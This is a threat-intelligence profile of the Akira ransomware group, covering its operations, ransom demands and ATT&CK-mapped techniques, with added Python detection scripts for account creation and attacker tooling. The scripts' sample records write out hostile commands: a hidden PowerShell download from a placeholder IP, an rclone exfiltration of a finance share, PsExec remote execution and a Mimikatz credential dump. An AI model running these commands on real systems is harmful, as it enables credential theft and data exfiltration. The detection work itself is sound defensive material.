Overview and latest claimed attacks

The ransomware group akira began drawing cybersecurity community attention in early 2023, targeting organizations of various sizes and sectors. According to OSINT sources and specialized blogs, akira employs double-extortion tactics, encrypting data and threatening public release to coerce victims into paying ransoms in cryptocurrency.

Structurally, akira operates as a Ransomware-as-a-Service (RaaS) model: a central “core team” develops and updates the malware, while external affiliates deploy it and negotiate with victims. Among the most recent claimed attacks are organizations in the healthcare and industrial sectors, involving sensitive data breaches and ransom demands of varying amounts.

Group history and interactions with other ransomware actors

From initial sightings, akira emerged as a seemingly new actor, with no obvious ties to more established groups like Conti, REvil, or Trickbot. However, some researchers have noted resemblances to components used by Babuk or older LockBit loaders, suggesting possible collaboration or purchase of kits and exploits through underground forums.


Links to other ransomware groups

  • There is no concrete evidence that akira directly descends from disbanded groups such as Conti or REvil.
  • Discussions on XSS Forum and BreachForums hint at tool-sharing between akira affiliates and smaller ransomware operators.


Collaborations, tool sharing, and internal conflict

  • akira seems to acquire exploits and tools from dark web marketplaces, sharing portions of their gains with sellers or distribution networks.
  • No major internal conflict has been reported, although some affiliate complaints—concerning delayed ransom payouts—have surfaced on cybercrime Telegram channels.


Financial data & ransom demands

Amounts demanded

  • average ransoms: USD 150,000 – 400,000 in cryptocurrency
  • known maximum demands: up to USD 1 million

Currencies used

  • primarily Bitcoin (BTC)
  • occasional use of Monero (XMR) for greater anonymity

Negotiation strategies

  • double extortion: threat of data publication
  • use of leak sites with countdowns for public exposure

Estimated total revenue

  • precise earnings are unknown; some estimates suggest potential revenue exceeding USD 3 million


Techniques employed

Advanced Phishing (Spear Phishing)

  • Targeted emails and malicious attachments aimed at key personnel.
  • MITRE ATT&CK: T1566

VPN/RDP Exploitation

  • Exploitation of weak credentials or known VPN/RDP vulnerabilities.
  • MITRE ATT&CK: T1190

Execution & Propagation techniques

  • Use of scripts to quietly download and deploy payloads.
  • MITRE ATT&CK: T1059

Living-off-the-Land Tools

  • Leveraging PsExec and WMI for lateral movement.
  • MITRE ATT&CK: T1047

Persistence techniques

  • Creating registry keys or startup entries.
  • MITRE ATT&CK: T1547

Compromised accounts

  • Creating high-privileged user accounts.
  • MITRE ATT&CK: T1078
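
As an added detection example for the "Compromised accounts" entry above (T1078), and not part of this report: a short Python correlation over Windows Security events that flags an account which is created and then added to a privileged local group within a short window. The event IDs 4720 (user account created) and 4732 (member added to a security-enabled local group) are real; the flat field names are a simplified view of their EventData, the watch list of groups is an assumption, and the sample records are constructed.

```python
"""Correlate Windows Security events: account created, then made privileged.

Added example, not from the report. Event IDs 4720 (a user account was created)
and 4732 (a member was added to a security-enabled local group) are real
Windows Security event IDs; the flat field names below are a simplified view
of their EventData and the records are constructed, not real telemetry.
"""
from datetime import datetime

# Local groups whose membership grants high privilege (assumed watch list).
PRIVILEGED_GROUPS = {"Administrators", "Backup Operators", "Remote Management Users"}

# Constructed sample events, deliberately out of time order to exercise the sort.
SAMPLE_EVENTS = [
    {"EventID": 4732, "TimeCreated": "2024-01-10T02:14:40", "SubjectUserName": "admin.jdoe",
     "MemberName": "svc_backup2", "TargetUserName": "Administrators"},
    {"EventID": 4720, "TimeCreated": "2024-01-10T02:14:05", "SubjectUserName": "admin.jdoe",
     "TargetUserName": "svc_backup2"},
    {"EventID": 4720, "TimeCreated": "2024-01-10T09:00:00", "SubjectUserName": "hr.onboarding",
     "TargetUserName": "alice"},
    {"EventID": 4732, "TimeCreated": "2024-01-12T09:05:00", "SubjectUserName": "helpdesk.1",
     "MemberName": "alice", "TargetUserName": "Remote Desktop Users"},
    {"EventID": 4720, "TimeCreated": "2024-01-11T08:00:00", "SubjectUserName": "it.mlee",
     "TargetUserName": "bob"},
    {"EventID": 4732, "TimeCreated": "2024-01-11T15:00:00", "SubjectUserName": "it.mlee",
     "MemberName": "bob", "TargetUserName": "Administrators"},
]


def _ts(event):
    """Parse the ISO 8601 timestamp of one event."""
    return datetime.fromisoformat(event["TimeCreated"])


def find_new_privileged_accounts(events, window_seconds=3600):
    """Return one alert per account that is created (4720) and then added to a
    privileged group (4732) no more than `window_seconds` later. Events are
    sorted by time first, so out-of-order delivery does not break the join."""
    created = {}   # account name -> (creation time, creating principal)
    alerts = []
    for ev in sorted(events, key=_ts):
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"]] = (_ts(ev), ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev["TargetUserName"] in PRIVILEGED_GROUPS:
            hit = created.get(ev["MemberName"])
            if hit is None:
                continue  # pre-existing account: not the pattern we are after
            created_at, creator = hit
            delay = (_ts(ev) - created_at).total_seconds()
            if delay <= window_seconds:
                alerts.append({
                    "account": ev["MemberName"],
                    "group": ev["TargetUserName"],
                    "created_by": creator,
                    "elevated_by": ev["SubjectUserName"],
                    "seconds_between": int(delay),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_privileged_accounts(SAMPLE_EVENTS):
        print(alert)
```

With the default one-hour window only svc_backup2 is flagged (created and elevated 35 seconds apart, by the same principal); widening the window to a day also surfaces bob, whose elevation came seven hours after creation. The window is the tuning knob: an onboarding process that legitimately creates and elevates accounts will set it shorter or add an allow-list on `created_by`.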


Exfiltration & data destruction techniques

Data Transfer to third-party servers (SFTP, FTP)

  • Uploading stolen files to untracked hosting platforms.
  • MITRE ATT&CK: T1041

File encryption & backup deletion

  • Removing local and network backups to enforce ransom payment.
  • MITRE ATT&CK: T1486


Tools

Remote Access tools (RATs)

  • Remcos RAT: Remote control of infected systems.
  • NanoCore: In some cases used as secondary payloads for keylogging or credential theft.


Ransomware payloads & encryption tools

  • akira Payload: Custom variants with obfuscated code and proprietary packing.
  • Possible Additional Modules: Plugins designed for network reconnaissance (unconfirmed).


Lateral Movement Tools

  • PsExec: For deploying ransomware executables remotely.
  • Mimikatz: For credential harvesting used to move across the Windows network.


Data Exfiltration Tools

  • Rclone: Secure transfer of exfiltrated data to cloud storage.
  • Wget/PowerShell: Used for stealthy downloading/executing of support scripts.


Living-off-the-Land Tools

  • PowerShell: Widely used for stealthy script execution.
  • WMIC: To launch processes and monitor remote host activity.

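As an added detection example covering both the Techniques section (T1059, T1047, T1041) and the lateral-movement, exfiltration and living-off-the-land tools listed just above, and not part of this report: a Python triage pass over process-creation records. The field names follow Sysmon Event ID 1 (Image, CommandLine, User); the host names, paths and the IP address (from a documentation range) are invented sample data; the ATT&CK IDs are the report's own mapping, except T1003 for Mimikatz, which the report lists without an ID.

```python
"""Triage process-creation records for the tooling named in this report.

Added example, not from the report. The records are constructed Sysmon-style
Event ID 1 fields (Image, CommandLine, User); the rules match the tools the
report lists (PsExec, WMIC, PowerShell download cradles, Rclone, Mimikatz)
and tag each hit with the ATT&CK technique the report gives for it. Mimikatz
has no ID in the report, so the standard mapping T1003 (OS Credential
Dumping) is used and marked as such.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    index: int          # position of the record in the input
    tool: str
    technique: str
    user: str
    command_line: str


# (label, ATT&CK technique, regex applied to "Image | CommandLine")
RULES = [
    ("PsExec", "T1047",
     re.compile(r"\bpsexe(c|svc)(64)?\.exe\b", re.I)),
    ("WMIC remote process create", "T1047",
     re.compile(r"\bwmic\.exe\b.*\bprocess\b.*\bcall\b.*\bcreate\b", re.I | re.S)),
    ("PowerShell download/encoded command", "T1059",
     re.compile(r"\bpowershell(\.exe)?\b.*(DownloadString|DownloadFile|Invoke-WebRequest"
                r"|\biwr\b|-enc(odedcommand)?\b)", re.I | re.S)),
    ("Rclone", "T1041",
     re.compile(r"\brclone(\.exe)?\b", re.I)),
    ("Mimikatz", "T1003",   # not in the report's table; standard ATT&CK mapping
     re.compile(r"\bmimikatz\b|\b(sekurlsa|lsadump)::", re.I)),
]

# Constructed sample records (not real telemetry). 203.0.113.0/24 is a
# documentation range; host names and paths are invented.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe", "User": "CORP\\alice"},
    {"Image": r"C:\Windows\System32\wmic.exe",
     "CommandLine": r'wmic /node:FILESRV01 process call create "C:\Temp\update.exe"',
     "User": "CORP\\svc_backup2"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\Backup.ps1",   # benign
     "User": "CORP\\svc_backup"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.10/s.ps1 -OutFile C:\\Temp\\s.ps1"',
     "User": "CORP\\svc_backup2"},
    {"Image": r"C:\Temp\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Shares\Finance remote:bucket --transfers 16",
     "User": "CORP\\svc_backup2"},
    {"Image": r"C:\Tools\PsExec64.exe",
     "CommandLine": r"PsExec64.exe \\WS-042 -s -d C:\Temp\update.exe",
     "User": "CORP\\svc_backup2"},
    {"Image": r"C:\Users\Public\m.exe",   # renamed binary: a filename rule alone would miss it
     "CommandLine": 'm.exe "sekurlsa::logonpasswords" exit',
     "User": "CORP\\svc_backup2"},
]


def triage(events):
    """Return a Finding for every (record, rule) pair that matches."""
    findings = []
    for i, ev in enumerate(events):
        haystack = f'{ev.get("Image", "")} | {ev.get("CommandLine", "")}'
        for label, technique, rx in RULES:
            if rx.search(haystack):
                findings.append(Finding(i, label, technique, ev.get("User", "?"),
                                        ev.get("CommandLine", "")))
    return findings


def by_technique(findings):
    """Count findings per ATT&CK technique, e.g. {'T1047': 2, ...}."""
    return dict(Counter(f.technique for f in findings))


def by_user(findings):
    """Users with more than one distinct tool hit: the clustering that turns
    single noisy matches into something worth an analyst's time."""
    tools = {}
    for f in findings:
        tools.setdefault(f.user, set()).add(f.tool)
    return {u: sorted(t) for u, t in tools.items() if len(t) > 1}


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.technique}] {f.tool:<38} {f.user}: {f.command_line}")
    print(by_technique(found))
    print(by_user(found))
```

Two design points carry over to real telemetry: the Mimikatz rule keys on the module syntax in the command line rather than the file name, so a renamed binary still matches, and `by_user` reports only principals that tripped more than one rule, which is what separates a backup operator running Rclone once from an account that has touched WMIC, PsExec, Rclone and a credential dumper in one session.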

Note: the information in this report is sourced from materials of varying reliability and may evolve over time. We will update regularly to provide the most accurate view of the akira ransomware group’s activities.